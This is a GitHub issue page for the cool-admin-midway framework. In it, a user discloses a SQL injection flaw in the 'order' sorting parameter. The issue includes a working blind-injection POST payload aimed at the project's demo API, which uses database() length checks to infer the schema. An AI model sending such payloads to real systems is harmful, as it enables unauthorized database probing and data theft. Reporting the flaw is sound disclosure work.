search

cool-team-official / cool-admin-midway

🔥 cool-admin(midway版)一个很酷的后台权限管理框架,Ai编码、流程编排、模块化、插件化、CRUD极速开发,永久开源免费,基于midway.js 3.x、typescript、typeorm、mysql、jwt、vue3、vite、element-ui等构建
https://cool-js.com
MIT License
2.65k stars 588 forks source link

list接口使用order来排序时有SQL注入风险 #68

Closed Leeiio closed 2 years ago

Leeiio commented 2 years ago

比如接口 https://show.cool-admin.com/api/admin/base/sys/log/page

使用参数进行POST提交

{
  "order": "(select case when (length (database())=6)then 1 else 1 *(select table_name from information_schema.tables)end)",
  "sort": "desc"
}

可以成功执行SQL语句得出数据库名称为6个字符